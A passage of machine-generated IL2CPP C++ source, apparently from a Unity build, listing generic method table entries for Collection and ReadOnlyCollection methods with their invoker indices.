3664/*(Il2CppMethodPointer)&Collection_1_Contains_m572221384_gshared*/, 1295/*1295*/}, { 4414, 3665/*(Il2CppMethodPointer)&Collection_1_CopyTo_m42272870_gshared*/, 86/*86*/}, { 4415, 3666/*(Il2CppMethodPointer)&Collection_1_GetEnumerator_m2294350815_gshared*/, 4/*4*/}, { 4416, 3667/*(Il2CppMethodPointer)&Collection_1_IndexOf_m4198354032_gshared*/, 1361/*1361*/}, { 4417, 3668/*(Il2CppMethodPointer)&Collection_1_Insert_m1489311409_gshared*/, 844/*844*/}, { 4418, 3669/*(Il2CppMethodPointer)&Collection_1_InsertItem_m724820684_gshared*/, 844/*844*/}, { 4419, 3670/*(Il2CppMethodPointer)&Collection_1_Remove_m3355928137_gshared*/, 1295/*1295*/}, { 4420, 3671/*(Il2CppMethodPointer)&Collection_1_RemoveAt_m1714549893_gshared*/, 42/*42*/}, { 4421, 3672/*(Il2CppMethodPointer)&Collection_1_RemoveItem_m1606402057_gshared*/, 42/*42*/}, { 4422, 3673/*(Il2CppMethodPointer)&Collection_1_get_Count_m727437623_gshared*/, 3/*3*/}, { 4423, 3674/*(Il2CppMethodPointer)&Collection_1_get_Item_m310799569_gshared*/, 843/*843*/}, { 4424, 3675/*(Il2CppMethodPointer)&Collection_1_set_Item_m3254085220_gshared*/, 844/*844*/}, { 4425, 3676/*(Il2CppMethodPointer)&Collection_1_SetItem_m403816581_gshared*/, 844/*844*/}, { 4426, 3677/*(Il2CppMethodPointer)&Collection_1_IsValidItem_m2247536214_gshared*/, 1/*1*/}, { 4427, 3678/*(Il2CppMethodPointer)&Collection_1_ConvertItem_m3941916604_gshared*/, 859/*859*/}, { 4428, 3679/*(Il2CppMethodPointer)&Collection_1_CheckWritable_m2105306330_gshared*/, 90/*90*/}, { 4429, 3680/*(Il2CppMethodPointer)&Collection_1_IsSynchronized_m3100213596_gshared*/, 1/*1*/}, { 4430, 3681/*(Il2CppMethodPointer)&Collection_1_IsFixedSize_m304327897_gshared*/, 1/*1*/}, { 4431, 3682/*(Il2CppMethodPointer)&ReadOnlyCollection_1__ctor_m1954392161_gshared*/, 90/*90*/}, { 4432, 3683/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Add_m572380027_gshared*/, 42/*42*/}, { 4433, 3684/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Clear_m147484303_gshared*/, 0/*0*/}, { 4434, 3685/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_Insert_m1261508920_gshared*/, 210/*210*/}, { 4435, 3686/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Remove_m332075262_gshared*/, 25/*25*/}, { 4436, 3687/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_RemoveAt_m1592158292_gshared*/, 42/*42*/}, { 4437, 3688/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_get_Item_m1989437080_gshared*/, 24/*24*/}, { 4438, 3689/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_set_Item_m1532495847_gshared*/, 210/*210*/}, { 4439, 3690/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m1251192075_gshared*/, 43/*43*/}, { 4440, 3691/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_CopyTo_m1170021578_gshared*/, 86/*86*/}, { 4441, 3692/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IEnumerable_GetEnumerator_m3105529063_gshared*/, 4/*4*/}, { 4442, 3693/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Add_m4111569886_gshared*/, 5/*5*/}, { 4443, 3694/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Clear_m3928905452_gshared*/, 0/*0*/}, { 4444, 3695/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Contains_m2320811592_gshared*/, 1/*1*/}, { 4445, 3696/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_IndexOf_m3499979880_gshared*/, 5/*5*/}, { 4446, 3697/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Insert_m1130110335_gshared*/, 187/*187*/}, { 4447, 3698/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Remove_m2638959775_gshared*/, 90/*90*/}, { 4448, 3699/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_RemoveAt_m1101606769_gshared*/, 42/*42*/}, { 4449, 3700/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_IsSynchronized_m1518595654_gshared*/, 43/*43*/}, { 4450, 3701/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_SyncRoot_m2702046016_gshared*/, 4/*4*/}, { 4451, 3702/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsFixedSize_m1449825959_gshared*/, 43/*43*/}, { 4452, 3703/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsReadOnly_m3043542810_gshared*/, 43/*43*/}, { 4453, 3704/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_Item_m3677233651_gshared*/, 97/*97*/}, { 4454, 3705/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_set_Item_m1233322304_gshared*/, 187/*187*/}, { 4455, 3706/*(Il2CppMethodPointer)&ReadOnlyCollection_1_Contains_m1800950533_gshared*/, 25/*25*/}, { 4456, 3707/*(Il2CppMethodPointer)&ReadOnlyCollection_1_CopyTo_m2966309343_gshared*/, 86/*86*/}, { 4457, 3708/*(Il2CppMethodPointer)&ReadOnlyCollection_1_GetEnumerator_m900113698_gshared*/, 4/*4*/}, { 4458, 3709/*(Il2CppMethodPointer)&ReadOnlyCollection_1_IndexOf_m3753722947_gshared*/, 24/*24*/}, { 4459, 3710/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Count_m1555675278_gshared*/, 3/*3*/}, { 4460, 3711/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Item_m1402893004_gshared*/, 24/*24*/}, { 4461, 3712/*(Il2CppMethodPointer)&ReadOnlyCollection_1__ctor_m1646338777_gshared*/, 90/*90*/}, { 4462, 3713/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Add_m2039498095_gshared*/, 1374/*1374*/}, { 4463, 3714/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Clear_m388357963_gshared*/, 0/*0*/}, { 4464, 3715/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_Insert_m1806207944_gshared*/, 1414/*1414*/}, { 4465, 3716/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Remove_m3358595294_gshared*/, 1268/*1268*/}, { 4466, 3717/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_RemoveAt_m352618588_gshared*/, 42/*42*/}, { 4467, 3718/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_get_Item_m2394308736_gshared*/, 1476/*1476*/}, { 4468, 3719/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_set_Item_m1769983091_gshared*/, 1414/*1414*/}, { 4469, 3720/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m1457517975_gshared*/, 43/*43*/}, { 4470, 3721/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_CopyTo_m406069566_gshared*/, 86/*86*/}, { 4471, 3722/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IEnumerable_GetEnumerator_m2739298075_gshared*/, 4/*4*/}, { 4472, 3723/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Add_m2333231354_gshared*/, 5/*5*/}, { 4473, 3724/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Clear_m1704696544_gshared*/, 0/*0*/}, { 4474, 3725/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Contains_m1633768124_gshared*/, 1/*1*/}, { 4475, 3726/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_IndexOf_m3466286536_gshared*/, 5/*5*/}, { 4476, 3727/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Insert_m276668235_gshared*/, 187/*187*/}, { 4477, 3728/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Remove_m1705518883_gshared*/, 90/*90*/}, { 4478, 3729/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_RemoveAt_m525136953_gshared*/, 42/*42*/}, { 4479, 3730/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_IsSynchronized_m162628114_gshared*/, 43/*43*/}, { 4480, 3731/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_SyncRoot_m3373229908_gshared*/, 4/*4*/}, { 4481, 3732/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsFixedSize_m158012227_gshared*/, 43/*43*/}, { 4482, 3733/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsReadOnly_m754885222_gshared*/, 43/*43*/}, { 4483, 3734/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_Item_m375043207_gshared*/, 97/*97*/}, { 4484, 3735/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_set_Item_m3603878768_gshared*/, 187/*187*/}, { 4485, 3736/*(Il2CppMethodPointer)&ReadOnlyCollection_1_Contains_m2306259645_gshared*/, 1268/*1268*/}, { 4486, 3737/*(Il2CppMethodPointer)&ReadOnlyCollection_1_CopyTo_m1099920083_gshared*/, 86/*86*/}, { 4487, 3738/*(Il2CppMethodPointer)&ReadOnlyCollection_1_GetEnumerator_m1232423838_gshared*/, 4/*4*/}, { 4488, 3739/*(Il2CppMethodPointer)&ReadOnlyCollection_1_IndexOf_m3738093351_gshared*/, 1332/*1332*/}, { 4489, 3740/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Count_m1203010282_gshared*/, 3/*3*/}, { 4490, 3741/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Item_m1909688500_gshared*/, 1476/*1476*/}, { 4491, 3742/*(Il2CppMethodPointer)&ReadOnlyCollection_1__ctor_m3631866590_gshared*/, 90/*90*/}, { 4492, 3743/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Add_m500367370_gshared*/, 1375/*1375*/}, { 4493, 3744/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Clear_m3567018366_gshared*/, 0/*0*/}, { 4494, 3745/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_Insert_m109972123_gshared*/, 1415/*1415*/}, { 4495, 3746/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Remove_m3503689987_gshared*/, 1269/*1269*/}, { 4496, 3747/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_RemoveAt_m3335151847_gshared*/, 42/*42*/}, { 4497, 3748/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_get_Item_m2627096795_gshared*/, 1477/*1477*/}, { 4498, 3749/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_set_Item_m25653560_gshared*/, 1415/*1415*/}, { 4499, 3750/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m2261384768_gshared*/, 43/*43*/}, { 4500, 3751/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_CopyTo_m90405417_gshared*/, 86/*86*/}, { 4501, 3752/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IEnumerable_GetEnumerator_m4244142392_gshared*/, 4/*4*/}, { 4502, 3753/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Add_m527174473_gshared*/, 5/*5*/}, { 4503, 3754/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Clear_m3006875897_gshared*/, 0/*0*/}, { 4504, 3755/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Contains_m1472898377_gshared*/, 1/*1*/}, { 4505, 3756/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_IndexOf_m2332740791_gshared*/, 5/*5*/}, { 4506, 3757/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Insert_m3679749778_gshared*/, 187/*187*/}, { 4507, 3758/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Remove_m1743441024_gshared*/, 90/*90*/}, { 4508, 3759/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_RemoveAt_m2459290100_gshared*/, 42/*42*/}, { 4509, 3760/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_IsSynchronized_m2987885125_gshared*/, 43/*43*/}, { 4510, 3761/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_SyncRoot_m784229325_gshared*/, 4/*4*/}, { 4511, 3762/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsFixedSize_m2568100242_gshared*/, 43/*43*/}, { 4512, 3763/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsReadOnly_m3772083849_gshared*/, 43/*43*/}, { 4513, 3764/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_Item_m378281456_gshared*/, 97/*97*/}, { 4514, 3765/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_set_Item_m3614691999_gshared*/, 187/*187*/}, { 4515, 3766/*(Il2CppMethodPointer)&ReadOnlyCollection_1_Contains_m1895759124_gshared*/, 1269/*1269*/}, { 4516, 3767/*(Il2CppMethodPointer)&ReadOnlyCollection_1_CopyTo_m1342318446_gshared*/, 86/*86*/}, { 4517, 3768/*(Il2CppMethodPointer)&ReadOnlyCollection_1_GetEnumerator_m2458478577_gshared*/, 4/*4*/}, { 4518, 3769/*(Il2CppMethodPointer)&ReadOnlyCollection_1_IndexOf_m4259615576_gshared*/, 1333/*1333*/}, { 4519, 3770/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Count_m1977104809_gshared*/, 3/*3*/}, { 4520, 3771/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Item_m2467004527_gshared*/, 1477/*1477*/}, { 4521, 3772/*(Il2CppMethodPointer)&ReadOnlyCollection_1__ctor_m1539890895_gshared*/, 90/*90*/}, { 4522, 3773/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Add_m1551974917_gshared*/, 1254/*1254*/}, { 4523, 3774/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Clear_m519653833_gshared*/, 0/*0*/}, { 4524, 3775/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_Insert_m2456642944_gshared*/, 1253/*1253*/}, { 4525, 3776/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Remove_m3751131234_gshared*/, 1282/*1282*/}, { 4526, 3777/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_RemoveAt_m2137782652_gshared*/, 42/*42*/}, { 4527, 3778/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_get_Item_m4108352242_gshared*/, 1251/*1251*/}, { 4528, 3779/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_set_Item_m1099846173_gshared*/, 1253/*1253*/}, { 4529, 3780/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m3508872969_gshared*/, 43/*43*/}, { 4530, 3781/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_CopyTo_m4169787258_gshared*/, 86/*86*/}, { 4531, 3782/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IEnumerable_GetEnumerator_m3417721261_gshared*/, 4/*4*/}, { 4532, 3783/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Add_m3065652010_gshared*/, 5/*5*/}, { 4533, 3784/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Clear_m1751509776_gshared*/, 0/*0*/}, { 4534, 3785/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Contains_m3508431156_gshared*/, 1/*1*/}, { 4535, 3786/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_IndexOf_m3232551672_gshared*/, 5/*5*/}, { 4536, 3787/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Insert_m2659121605_gshared*/, 187/*187*/}, { 4537, 3788/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Remove_m2779327941_gshared*/, 90/*90*/}, { 4538, 3789/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_RemoveAt_m3004588099_gshared*/, 42/*42*/}, { 4539, 3790/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_IsSynchronized_m2344337514_gshared*/, 43/*43*/}, { 4540, 3791/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_SyncRoot_m2779904122_gshared*/, 4/*4*/}, { 4541, 3792/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsFixedSize_m465187273_gshared*/, 43/*43*/}, { 4542, 3793/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsReadOnly_m3531246526_gshared*/, 43/*43*/}, { 4543, 3794/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_Item_m3472752385_gshared*/, 97/*97*/}, { 4544, 3795/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_set_Item_m1272038804_gshared*/, 187/*187*/}, { 4545, 3796/*(Il2CppMethodPointer)&ReadOnlyCollection_1_Contains_m1656472127_gshared*/, 1282/*1282*/}, { 4546, 3797/*(Il2CppMethodPointer)&ReadOnlyCollection_1_CopyTo_m3277805657_gshared*/, 86/*86*/}, { 4547, 3798/*(Il2CppMethodPointer)&ReadOnlyCollection_1_GetEnumerator_m713393110_gshared*/, 4/*4*/}, { 4548, 3799/*(Il2CppMethodPointer)&ReadOnlyCollection_1_IndexOf_m3054637117_gshared*/, 1346/*1346*/}, { 4549, 3800/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Count_m2180604490_gshared*/, 3/*3*/}, { 4550, 3801/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Item_m724340838_gshared*/, 1251/*1251*/}, { 4551, 3802/*(Il2CppMethodPointer)&ReadOnlyCollection_1__ctor_m3532148437_gshared*/, 90/*90*/}, { 4552, 3803/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Add_m1138306067_gshared*/, 1063/*1063*/}, { 4553, 3804/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Clear_m1147417863_gshared*/, 0/*0*/}, { 4554, 3805/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_Insert_m1259068750_gshared*/, 1430/*1430*/}, { 4555, 3806/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Remove_m1060547576_gshared*/, 1284/*1284*/}, { 4556, 3807/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_RemoveAt_m2210507818_gshared*/, 42/*42*/}, { 4557, 3808/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_get_Item_m1215755942_gshared*/, 1216/*1216*/}, { 4558, 3809/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_set_Item_m257196015_gshared*/, 1430/*1430*/}, { 4559, 3810/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m1280561739_gshared*/, 43/*43*/}, { 4560, 3811/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_CopyTo_m1129689124_gshared*/, 86/*86*/}, { 4561, 3812/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IEnumerable_GetEnumerator_m342729111_gshared*/, 4/*4*/}, { 4562, 3813/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Add_m224184952_gshared*/, 5/*5*/}, { 4563, 3814/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Clear_m1918003010_gshared*/, 0/*0*/}, { 4564, 3815/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Contains_m3707723158_gshared*/, 1/*1*/}, { 4565, 3816/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_IndexOf_m4203085614_gshared*/, 5/*5*/}, { 4566, 3817/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Insert_m3650067527_gshared*/, 187/*187*/}, { 4567, 3818/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Remove_m2350545199_gshared*/, 90/*90*/}, { 4568, 3819/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_RemoveAt_m2396335261_gshared*/, 42/*42*/}, { 4569, 3820/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_IsSynchronized_m59103888_gshared*/, 43/*43*/}, { 4570, 3821/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_SyncRoot_m1577944046_gshared*/, 4/*4*/}, { 4571, 3822/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsFixedSize_m1563258303_gshared*/, 43/*43*/}, { 4572, 3823/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsReadOnly_m4048508940_gshared*/, 43/*43*/}, { 4573, 3824/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_Item_m2896192331_gshared*/, 97/*97*/}, { 4574, 3825/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_set_Item_m2206229246_gshared*/, 187/*187*/}, { 4575, 3826/*(Il2CppMethodPointer)&ReadOnlyCollection_1_Contains_m267119689_gshared*/, 1284/*1284*/}, { 4576, 3827/*(Il2CppMethodPointer)&ReadOnlyCollection_1_CopyTo_m3865292431_gshared*/, 86/*86*/}, { 4577, 3828/*(Il2CppMethodPointer)&ReadOnlyCollection_1_GetEnumerator_m2315871588_gshared*/, 4/*4*/}, { 4578, 3829/*(Il2CppMethodPointer)&ReadOnlyCollection_1_IndexOf_m868920811_gshared*/, 1348/*1348*/}, { 4579, 3830/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Count_m329772104_gshared*/, 3/*3*/}, { 4580, 3831/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Item_m3471709410_gshared*/, 1216/*1216*/}, { 4581, 3832/*(Il2CppMethodPointer)&ReadOnlyCollection_1__ctor_m1419645665_gshared*/, 90/*90*/}, { 4582, 3833/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Add_m2328364475_gshared*/, 1394/*1394*/}, { 4583, 3834/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Clear_m1785953911_gshared*/, 0/*0*/}, { 4584, 3835/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_Insert_m4216310986_gshared*/, 1437/*1437*/}, { 4585, 3836/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Remove_m1342418180_gshared*/, 1291/*1291*/}, { 4586, 3837/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_RemoveAt_m2955858126_gshared*/, 42/*42*/}, { 4587, 3838/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_get_Item_m1043133762_gshared*/, 1500/*1500*/}, { 4588, 3839/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_set_Item_m3447198503_gshared*/, 1437/*1437*/}, { 4589, 3840/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m2197226755_gshared*/, 43/*43*/}, { 4590, 3841/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_CopyTo_m185585668_gshared*/, 86/*86*/}, { 4591, 3842/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IEnumerable_GetEnumerator_m4248982967_gshared*/, 4/*4*/}, { 4592, 3843/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Add_m88481520_gshared*/, 5/*5*/}, { 4593, 3844/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Clear_m2240307498_gshared*/, 0/*0*/}, { 4594, 3845/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Contains_m673434054_gshared*/, 1/*1*/}, { 4595, 3846/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_IndexOf_m2071241978_gshared*/, 5/*5*/}, { 4596, 3847/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Insert_m1882335319_gshared*/, 187/*187*/}, { 4597, 3848/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Remove_m225317735_gshared*/, 90/*90*/}, { 4598, 3849/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_RemoveAt_m3760970257_gshared*/, 42/*42*/}, { 4599, 3850/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_IsSynchronized_m3127987432_gshared*/, 43/*43*/}, { 4600, 3851/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_SyncRoot_m2300639166_gshared*/, 4/*4*/}, { 4601, 3852/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsFixedSize_m1559726679_gshared*/, 43/*43*/}, { 4602, 3853/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsReadOnly_m823169068_gshared*/, 43/*43*/}, { 4603, 3854/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_Item_m809154283_gshared*/, 97/*97*/}, { 4604, 3855/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_set_Item_m1377990618_gshared*/, 187/*187*/}, { 4605, 3856/*(Il2CppMethodPointer)&ReadOnlyCollection_1_Contains_m3936562733_gshared*/, 1291/*1291*/}, { 4606, 3857/*(Il2CppMethodPointer)&ReadOnlyCollection_1_CopyTo_m3099014815_gshared*/, 86/*86*/}, { 4607, 3858/*(Il2CppMethodPointer)&ReadOnlyCollection_1_GetEnumerator_m1782241364_gshared*/, 4/*4*/}, { 4608, 3859/*(Il2CppMethodPointer)&ReadOnlyCollection_1_IndexOf_m3774411091_gshared*/, 1356/*1356*/}, { 4609, 3860/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Count_m2082329264_gshared*/, 3/*3*/}, { 4610, 3861/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Item_m2581990262_gshared*/, 1500/*1500*/}, { 4611, 3862/*(Il2CppMethodPointer)&ReadOnlyCollection_1__ctor_m1786989483_gshared*/, 90/*90*/}, { 4612, 3863/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Add_m1173143793_gshared*/, 1395/*1395*/}, { 4613, 3864/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Clear_m3724457061_gshared*/, 0/*0*/}, { 4614, 3865/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_Insert_m3054305464_gshared*/, 1438/*1438*/}, { 4615, 3866/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Remove_m2957273994_gshared*/, 1292/*1292*/}, { 4616, 3867/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_RemoveAt_m878653284_gshared*/, 42/*42*/}, { 4617, 